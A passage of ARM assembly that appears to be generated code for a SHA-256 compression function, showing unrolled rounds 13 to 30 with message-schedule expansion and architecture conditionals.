add r7,r7,r3 @ h+=Maj(a,b,c) from the past
eor r0,r0,r11,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 13
add r7,r7,r3 @ h+=Maj(a,b,c) from the past
ldrb r3,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r3,lsl#8
ldrb r3,[r1],#4
orr r2,r2,r0,lsl#16
# if 13==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r11,r11,ror#5
orr r2,r2,r3,lsl#24
eor r0,r0,r11,ror#19 @ Sigma1(e)
#endif
ldr r3,[r14],#4 @ *K256++
add r6,r6,r2 @ h+=X[i]
str r2,[sp,#13*4]
eor r2,r4,r5
add r6,r6,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r11
add r6,r6,r3 @ h+=K256[i]
eor r2,r2,r5 @ Ch(e,f,g)
eor r0,r7,r7,ror#11
add r6,r6,r2 @ h+=Ch(e,f,g)
#if 13==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 13<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r7,r8 @ a^b, b^c in next round
#else
ldr r2,[sp,#15*4] @ from future BODY_16_xx
eor r3,r7,r8 @ a^b, b^c in next round
ldr r1,[sp,#12*4] @ from future BODY_16_xx
#endif
eor r0,r0,r7,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r10,r10,r6 @ d+=h
eor r12,r12,r8 @ Maj(a,b,c)
add r6,r6,r0,ror#2 @ h+=Sigma0(a)
@ add r6,r6,r12 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 14
# if 14==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r10,r10,ror#5
add r6,r6,r12 @ h+=Maj(a,b,c) from the past
eor r0,r0,r10,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 14
add r6,r6,r12 @ h+=Maj(a,b,c) from the past
ldrb r12,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r12,lsl#8
ldrb r12,[r1],#4
orr r2,r2,r0,lsl#16
# if 14==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r10,r10,ror#5
orr r2,r2,r12,lsl#24
eor r0,r0,r10,ror#19 @ Sigma1(e)
#endif
ldr r12,[r14],#4 @ *K256++
add r5,r5,r2 @ h+=X[i]
str r2,[sp,#14*4]
eor r2,r11,r4
add r5,r5,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r10
add r5,r5,r12 @ h+=K256[i]
eor r2,r2,r4 @ Ch(e,f,g)
eor r0,r6,r6,ror#11
add r5,r5,r2 @ h+=Ch(e,f,g)
#if 14==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 14<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r6,r7 @ a^b, b^c in next round
#else
ldr r2,[sp,#0*4] @ from future BODY_16_xx
eor r12,r6,r7 @ a^b, b^c in next round
ldr r1,[sp,#13*4] @ from future BODY_16_xx
#endif
eor r0,r0,r6,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r9,r9,r5 @ d+=h
eor r3,r3,r7 @ Maj(a,b,c)
add r5,r5,r0,ror#2 @ h+=Sigma0(a)
@ add r5,r5,r3 @ h+=Maj(a,b,c)
#if __ARM_ARCH__>=7
@ ldr r2,[r1],#4 @ 15
# if 15==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r9,r9,ror#5
add r5,r5,r3 @ h+=Maj(a,b,c) from the past
eor r0,r0,r9,ror#19 @ Sigma1(e)
# ifndef __ARMEB__
rev r2,r2
# endif
#else
@ ldrb r2,[r1,#3] @ 15
add r5,r5,r3 @ h+=Maj(a,b,c) from the past
ldrb r3,[r1,#2]
ldrb r0,[r1,#1]
orr r2,r2,r3,lsl#8
ldrb r3,[r1],#4
orr r2,r2,r0,lsl#16
# if 15==15
str r1,[sp,#17*4] @ make room for r1
# endif
eor r0,r9,r9,ror#5
orr r2,r2,r3,lsl#24
eor r0,r0,r9,ror#19 @ Sigma1(e)
#endif
ldr r3,[r14],#4 @ *K256++
add r4,r4,r2 @ h+=X[i]
str r2,[sp,#15*4]
eor r2,r10,r11
add r4,r4,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r9
add r4,r4,r3 @ h+=K256[i]
eor r2,r2,r11 @ Ch(e,f,g)
eor r0,r5,r5,ror#11
add r4,r4,r2 @ h+=Ch(e,f,g)
#if 15==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 15<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r5,r6 @ a^b, b^c in next round
#else
ldr r2,[sp,#1*4] @ from future BODY_16_xx
eor r3,r5,r6 @ a^b, b^c in next round
ldr r1,[sp,#14*4] @ from future BODY_16_xx
#endif
eor r0,r0,r5,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r8,r8,r4 @ d+=h
eor r12,r12,r6 @ Maj(a,b,c)
add r4,r4,r0,ror#2 @ h+=Sigma0(a)
@ add r4,r4,r12 @ h+=Maj(a,b,c)
.Lrounds_16_xx:
@ ldr r2,[sp,#1*4] @ 16
@ ldr r1,[sp,#14*4]
mov r0,r2,ror#7
add r4,r4,r12 @ h+=Maj(a,b,c) from the past
mov r12,r1,ror#17
eor r0,r0,r2,ror#18
eor r12,r12,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#0*4]
eor r12,r12,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#9*4]
add r12,r12,r0
eor r0,r8,r8,ror#5 @ from BODY_00_15
add r2,r2,r12
eor r0,r0,r8,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r12,[r14],#4 @ *K256++
add r11,r11,r2 @ h+=X[i]
str r2,[sp,#0*4]
eor r2,r9,r10
add r11,r11,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r8
add r11,r11,r12 @ h+=K256[i]
eor r2,r2,r10 @ Ch(e,f,g)
eor r0,r4,r4,ror#11
add r11,r11,r2 @ h+=Ch(e,f,g)
#if 16==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 16<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r4,r5 @ a^b, b^c in next round
#else
ldr r2,[sp,#2*4] @ from future BODY_16_xx
eor r12,r4,r5 @ a^b, b^c in next round
ldr r1,[sp,#15*4] @ from future BODY_16_xx
#endif
eor r0,r0,r4,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r7,r7,r11 @ d+=h
eor r3,r3,r5 @ Maj(a,b,c)
add r11,r11,r0,ror#2 @ h+=Sigma0(a)
@ add r11,r11,r3 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#2*4] @ 17
@ ldr r1,[sp,#15*4]
mov r0,r2,ror#7
add r11,r11,r3 @ h+=Maj(a,b,c) from the past
mov r3,r1,ror#17
eor r0,r0,r2,ror#18
eor r3,r3,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#1*4]
eor r3,r3,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#10*4]
add r3,r3,r0
eor r0,r7,r7,ror#5 @ from BODY_00_15
add r2,r2,r3
eor r0,r0,r7,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r3,[r14],#4 @ *K256++
add r10,r10,r2 @ h+=X[i]
str r2,[sp,#1*4]
eor r2,r8,r9
add r10,r10,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r7
add r10,r10,r3 @ h+=K256[i]
eor r2,r2,r9 @ Ch(e,f,g)
eor r0,r11,r11,ror#11
add r10,r10,r2 @ h+=Ch(e,f,g)
#if 17==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 17<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r11,r4 @ a^b, b^c in next round
#else
ldr r2,[sp,#3*4] @ from future BODY_16_xx
eor r3,r11,r4 @ a^b, b^c in next round
ldr r1,[sp,#0*4] @ from future BODY_16_xx
#endif
eor r0,r0,r11,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r6,r6,r10 @ d+=h
eor r12,r12,r4 @ Maj(a,b,c)
add r10,r10,r0,ror#2 @ h+=Sigma0(a)
@ add r10,r10,r12 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#3*4] @ 18
@ ldr r1,[sp,#0*4]
mov r0,r2,ror#7
add r10,r10,r12 @ h+=Maj(a,b,c) from the past
mov r12,r1,ror#17
eor r0,r0,r2,ror#18
eor r12,r12,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#2*4]
eor r12,r12,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#11*4]
add r12,r12,r0
eor r0,r6,r6,ror#5 @ from BODY_00_15
add r2,r2,r12
eor r0,r0,r6,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r12,[r14],#4 @ *K256++
add r9,r9,r2 @ h+=X[i]
str r2,[sp,#2*4]
eor r2,r7,r8
add r9,r9,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r6
add r9,r9,r12 @ h+=K256[i]
eor r2,r2,r8 @ Ch(e,f,g)
eor r0,r10,r10,ror#11
add r9,r9,r2 @ h+=Ch(e,f,g)
#if 18==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 18<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r10,r11 @ a^b, b^c in next round
#else
ldr r2,[sp,#4*4] @ from future BODY_16_xx
eor r12,r10,r11 @ a^b, b^c in next round
ldr r1,[sp,#1*4] @ from future BODY_16_xx
#endif
eor r0,r0,r10,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r5,r5,r9 @ d+=h
eor r3,r3,r11 @ Maj(a,b,c)
add r9,r9,r0,ror#2 @ h+=Sigma0(a)
@ add r9,r9,r3 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#4*4] @ 19
@ ldr r1,[sp,#1*4]
mov r0,r2,ror#7
add r9,r9,r3 @ h+=Maj(a,b,c) from the past
mov r3,r1,ror#17
eor r0,r0,r2,ror#18
eor r3,r3,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#3*4]
eor r3,r3,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#12*4]
add r3,r3,r0
eor r0,r5,r5,ror#5 @ from BODY_00_15
add r2,r2,r3
eor r0,r0,r5,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r3,[r14],#4 @ *K256++
add r8,r8,r2 @ h+=X[i]
str r2,[sp,#3*4]
eor r2,r6,r7
add r8,r8,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r5
add r8,r8,r3 @ h+=K256[i]
eor r2,r2,r7 @ Ch(e,f,g)
eor r0,r9,r9,ror#11
add r8,r8,r2 @ h+=Ch(e,f,g)
#if 19==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 19<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r9,r10 @ a^b, b^c in next round
#else
ldr r2,[sp,#5*4] @ from future BODY_16_xx
eor r3,r9,r10 @ a^b, b^c in next round
ldr r1,[sp,#2*4] @ from future BODY_16_xx
#endif
eor r0,r0,r9,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r4,r4,r8 @ d+=h
eor r12,r12,r10 @ Maj(a,b,c)
add r8,r8,r0,ror#2 @ h+=Sigma0(a)
@ add r8,r8,r12 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#5*4] @ 20
@ ldr r1,[sp,#2*4]
mov r0,r2,ror#7
add r8,r8,r12 @ h+=Maj(a,b,c) from the past
mov r12,r1,ror#17
eor r0,r0,r2,ror#18
eor r12,r12,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#4*4]
eor r12,r12,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#13*4]
add r12,r12,r0
eor r0,r4,r4,ror#5 @ from BODY_00_15
add r2,r2,r12
eor r0,r0,r4,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r12,[r14],#4 @ *K256++
add r7,r7,r2 @ h+=X[i]
str r2,[sp,#4*4]
eor r2,r5,r6
add r7,r7,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r4
add r7,r7,r12 @ h+=K256[i]
eor r2,r2,r6 @ Ch(e,f,g)
eor r0,r8,r8,ror#11
add r7,r7,r2 @ h+=Ch(e,f,g)
#if 20==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 20<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r8,r9 @ a^b, b^c in next round
#else
ldr r2,[sp,#6*4] @ from future BODY_16_xx
eor r12,r8,r9 @ a^b, b^c in next round
ldr r1,[sp,#3*4] @ from future BODY_16_xx
#endif
eor r0,r0,r8,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r11,r11,r7 @ d+=h
eor r3,r3,r9 @ Maj(a,b,c)
add r7,r7,r0,ror#2 @ h+=Sigma0(a)
@ add r7,r7,r3 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#6*4] @ 21
@ ldr r1,[sp,#3*4]
mov r0,r2,ror#7
add r7,r7,r3 @ h+=Maj(a,b,c) from the past
mov r3,r1,ror#17
eor r0,r0,r2,ror#18
eor r3,r3,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#5*4]
eor r3,r3,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#14*4]
add r3,r3,r0
eor r0,r11,r11,ror#5 @ from BODY_00_15
add r2,r2,r3
eor r0,r0,r11,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r3,[r14],#4 @ *K256++
add r6,r6,r2 @ h+=X[i]
str r2,[sp,#5*4]
eor r2,r4,r5
add r6,r6,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r11
add r6,r6,r3 @ h+=K256[i]
eor r2,r2,r5 @ Ch(e,f,g)
eor r0,r7,r7,ror#11
add r6,r6,r2 @ h+=Ch(e,f,g)
#if 21==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 21<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r7,r8 @ a^b, b^c in next round
#else
ldr r2,[sp,#7*4] @ from future BODY_16_xx
eor r3,r7,r8 @ a^b, b^c in next round
ldr r1,[sp,#4*4] @ from future BODY_16_xx
#endif
eor r0,r0,r7,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r10,r10,r6 @ d+=h
eor r12,r12,r8 @ Maj(a,b,c)
add r6,r6,r0,ror#2 @ h+=Sigma0(a)
@ add r6,r6,r12 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#7*4] @ 22
@ ldr r1,[sp,#4*4]
mov r0,r2,ror#7
add r6,r6,r12 @ h+=Maj(a,b,c) from the past
mov r12,r1,ror#17
eor r0,r0,r2,ror#18
eor r12,r12,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#6*4]
eor r12,r12,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#15*4]
add r12,r12,r0
eor r0,r10,r10,ror#5 @ from BODY_00_15
add r2,r2,r12
eor r0,r0,r10,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r12,[r14],#4 @ *K256++
add r5,r5,r2 @ h+=X[i]
str r2,[sp,#6*4]
eor r2,r11,r4
add r5,r5,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r10
add r5,r5,r12 @ h+=K256[i]
eor r2,r2,r4 @ Ch(e,f,g)
eor r0,r6,r6,ror#11
add r5,r5,r2 @ h+=Ch(e,f,g)
#if 22==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 22<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r6,r7 @ a^b, b^c in next round
#else
ldr r2,[sp,#8*4] @ from future BODY_16_xx
eor r12,r6,r7 @ a^b, b^c in next round
ldr r1,[sp,#5*4] @ from future BODY_16_xx
#endif
eor r0,r0,r6,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r9,r9,r5 @ d+=h
eor r3,r3,r7 @ Maj(a,b,c)
add r5,r5,r0,ror#2 @ h+=Sigma0(a)
@ add r5,r5,r3 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#8*4] @ 23
@ ldr r1,[sp,#5*4]
mov r0,r2,ror#7
add r5,r5,r3 @ h+=Maj(a,b,c) from the past
mov r3,r1,ror#17
eor r0,r0,r2,ror#18
eor r3,r3,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#7*4]
eor r3,r3,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#0*4]
add r3,r3,r0
eor r0,r9,r9,ror#5 @ from BODY_00_15
add r2,r2,r3
eor r0,r0,r9,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r3,[r14],#4 @ *K256++
add r4,r4,r2 @ h+=X[i]
str r2,[sp,#7*4]
eor r2,r10,r11
add r4,r4,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r9
add r4,r4,r3 @ h+=K256[i]
eor r2,r2,r11 @ Ch(e,f,g)
eor r0,r5,r5,ror#11
add r4,r4,r2 @ h+=Ch(e,f,g)
#if 23==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 23<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r5,r6 @ a^b, b^c in next round
#else
ldr r2,[sp,#9*4] @ from future BODY_16_xx
eor r3,r5,r6 @ a^b, b^c in next round
ldr r1,[sp,#6*4] @ from future BODY_16_xx
#endif
eor r0,r0,r5,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r8,r8,r4 @ d+=h
eor r12,r12,r6 @ Maj(a,b,c)
add r4,r4,r0,ror#2 @ h+=Sigma0(a)
@ add r4,r4,r12 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#9*4] @ 24
@ ldr r1,[sp,#6*4]
mov r0,r2,ror#7
add r4,r4,r12 @ h+=Maj(a,b,c) from the past
mov r12,r1,ror#17
eor r0,r0,r2,ror#18
eor r12,r12,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#8*4]
eor r12,r12,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#1*4]
add r12,r12,r0
eor r0,r8,r8,ror#5 @ from BODY_00_15
add r2,r2,r12
eor r0,r0,r8,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r12,[r14],#4 @ *K256++
add r11,r11,r2 @ h+=X[i]
str r2,[sp,#8*4]
eor r2,r9,r10
add r11,r11,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r8
add r11,r11,r12 @ h+=K256[i]
eor r2,r2,r10 @ Ch(e,f,g)
eor r0,r4,r4,ror#11
add r11,r11,r2 @ h+=Ch(e,f,g)
#if 24==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 24<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r4,r5 @ a^b, b^c in next round
#else
ldr r2,[sp,#10*4] @ from future BODY_16_xx
eor r12,r4,r5 @ a^b, b^c in next round
ldr r1,[sp,#7*4] @ from future BODY_16_xx
#endif
eor r0,r0,r4,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r7,r7,r11 @ d+=h
eor r3,r3,r5 @ Maj(a,b,c)
add r11,r11,r0,ror#2 @ h+=Sigma0(a)
@ add r11,r11,r3 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#10*4] @ 25
@ ldr r1,[sp,#7*4]
mov r0,r2,ror#7
add r11,r11,r3 @ h+=Maj(a,b,c) from the past
mov r3,r1,ror#17
eor r0,r0,r2,ror#18
eor r3,r3,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#9*4]
eor r3,r3,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#2*4]
add r3,r3,r0
eor r0,r7,r7,ror#5 @ from BODY_00_15
add r2,r2,r3
eor r0,r0,r7,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r3,[r14],#4 @ *K256++
add r10,r10,r2 @ h+=X[i]
str r2,[sp,#9*4]
eor r2,r8,r9
add r10,r10,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r7
add r10,r10,r3 @ h+=K256[i]
eor r2,r2,r9 @ Ch(e,f,g)
eor r0,r11,r11,ror#11
add r10,r10,r2 @ h+=Ch(e,f,g)
#if 25==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 25<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r11,r4 @ a^b, b^c in next round
#else
ldr r2,[sp,#11*4] @ from future BODY_16_xx
eor r3,r11,r4 @ a^b, b^c in next round
ldr r1,[sp,#8*4] @ from future BODY_16_xx
#endif
eor r0,r0,r11,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r6,r6,r10 @ d+=h
eor r12,r12,r4 @ Maj(a,b,c)
add r10,r10,r0,ror#2 @ h+=Sigma0(a)
@ add r10,r10,r12 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#11*4] @ 26
@ ldr r1,[sp,#8*4]
mov r0,r2,ror#7
add r10,r10,r12 @ h+=Maj(a,b,c) from the past
mov r12,r1,ror#17
eor r0,r0,r2,ror#18
eor r12,r12,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#10*4]
eor r12,r12,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#3*4]
add r12,r12,r0
eor r0,r6,r6,ror#5 @ from BODY_00_15
add r2,r2,r12
eor r0,r0,r6,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r12,[r14],#4 @ *K256++
add r9,r9,r2 @ h+=X[i]
str r2,[sp,#10*4]
eor r2,r7,r8
add r9,r9,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r6
add r9,r9,r12 @ h+=K256[i]
eor r2,r2,r8 @ Ch(e,f,g)
eor r0,r10,r10,ror#11
add r9,r9,r2 @ h+=Ch(e,f,g)
#if 26==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 26<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r10,r11 @ a^b, b^c in next round
#else
ldr r2,[sp,#12*4] @ from future BODY_16_xx
eor r12,r10,r11 @ a^b, b^c in next round
ldr r1,[sp,#9*4] @ from future BODY_16_xx
#endif
eor r0,r0,r10,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r5,r5,r9 @ d+=h
eor r3,r3,r11 @ Maj(a,b,c)
add r9,r9,r0,ror#2 @ h+=Sigma0(a)
@ add r9,r9,r3 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#12*4] @ 27
@ ldr r1,[sp,#9*4]
mov r0,r2,ror#7
add r9,r9,r3 @ h+=Maj(a,b,c) from the past
mov r3,r1,ror#17
eor r0,r0,r2,ror#18
eor r3,r3,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#11*4]
eor r3,r3,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#4*4]
add r3,r3,r0
eor r0,r5,r5,ror#5 @ from BODY_00_15
add r2,r2,r3
eor r0,r0,r5,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r3,[r14],#4 @ *K256++
add r8,r8,r2 @ h+=X[i]
str r2,[sp,#11*4]
eor r2,r6,r7
add r8,r8,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r5
add r8,r8,r3 @ h+=K256[i]
eor r2,r2,r7 @ Ch(e,f,g)
eor r0,r9,r9,ror#11
add r8,r8,r2 @ h+=Ch(e,f,g)
#if 27==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 27<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r9,r10 @ a^b, b^c in next round
#else
ldr r2,[sp,#13*4] @ from future BODY_16_xx
eor r3,r9,r10 @ a^b, b^c in next round
ldr r1,[sp,#10*4] @ from future BODY_16_xx
#endif
eor r0,r0,r9,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r4,r4,r8 @ d+=h
eor r12,r12,r10 @ Maj(a,b,c)
add r8,r8,r0,ror#2 @ h+=Sigma0(a)
@ add r8,r8,r12 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#13*4] @ 28
@ ldr r1,[sp,#10*4]
mov r0,r2,ror#7
add r8,r8,r12 @ h+=Maj(a,b,c) from the past
mov r12,r1,ror#17
eor r0,r0,r2,ror#18
eor r12,r12,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#12*4]
eor r12,r12,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#5*4]
add r12,r12,r0
eor r0,r4,r4,ror#5 @ from BODY_00_15
add r2,r2,r12
eor r0,r0,r4,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r12,[r14],#4 @ *K256++
add r7,r7,r2 @ h+=X[i]
str r2,[sp,#12*4]
eor r2,r5,r6
add r7,r7,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r4
add r7,r7,r12 @ h+=K256[i]
eor r2,r2,r6 @ Ch(e,f,g)
eor r0,r8,r8,ror#11
add r7,r7,r2 @ h+=Ch(e,f,g)
#if 28==31
and r12,r12,#0xff
cmp r12,#0xf2 @ done?
#endif
#if 28<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r12,r8,r9 @ a^b, b^c in next round
#else
ldr r2,[sp,#14*4] @ from future BODY_16_xx
eor r12,r8,r9 @ a^b, b^c in next round
ldr r1,[sp,#11*4] @ from future BODY_16_xx
#endif
eor r0,r0,r8,ror#20 @ Sigma0(a)
and r3,r3,r12 @ (b^c)&=(a^b)
add r11,r11,r7 @ d+=h
eor r3,r3,r9 @ Maj(a,b,c)
add r7,r7,r0,ror#2 @ h+=Sigma0(a)
@ add r7,r7,r3 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#14*4] @ 29
@ ldr r1,[sp,#11*4]
mov r0,r2,ror#7
add r7,r7,r3 @ h+=Maj(a,b,c) from the past
mov r3,r1,ror#17
eor r0,r0,r2,ror#18
eor r3,r3,r1,ror#19
eor r0,r0,r2,lsr#3 @ sigma0(X[i+1])
ldr r2,[sp,#13*4]
eor r3,r3,r1,lsr#10 @ sigma1(X[i+14])
ldr r1,[sp,#6*4]
add r3,r3,r0
eor r0,r11,r11,ror#5 @ from BODY_00_15
add r2,r2,r3
eor r0,r0,r11,ror#19 @ Sigma1(e)
add r2,r2,r1 @ X[i]
ldr r3,[r14],#4 @ *K256++
add r6,r6,r2 @ h+=X[i]
str r2,[sp,#13*4]
eor r2,r4,r5
add r6,r6,r0,ror#6 @ h+=Sigma1(e)
and r2,r2,r11
add r6,r6,r3 @ h+=K256[i]
eor r2,r2,r5 @ Ch(e,f,g)
eor r0,r7,r7,ror#11
add r6,r6,r2 @ h+=Ch(e,f,g)
#if 29==31
and r3,r3,#0xff
cmp r3,#0xf2 @ done?
#endif
#if 29<15
# if __ARM_ARCH__>=7
ldr r2,[r1],#4 @ prefetch
# else
ldrb r2,[r1,#3]
# endif
eor r3,r7,r8 @ a^b, b^c in next round
#else
ldr r2,[sp,#15*4] @ from future BODY_16_xx
eor r3,r7,r8 @ a^b, b^c in next round
ldr r1,[sp,#12*4] @ from future BODY_16_xx
#endif
eor r0,r0,r7,ror#20 @ Sigma0(a)
and r12,r12,r3 @ (b^c)&=(a^b)
add r10,r10,r6 @ d+=h
eor r12,r12,r8 @ Maj(a,b,c)
add r6,r6,r0,ror#2 @ h+=Sigma0(a)
@ add r6,r6,r12 @ h+=Maj(a,b,c)
@ ldr r2,[sp,#15*4] @ 30
@ ldr r1,[sp,#12*4]
mov r0,r2,ror#7
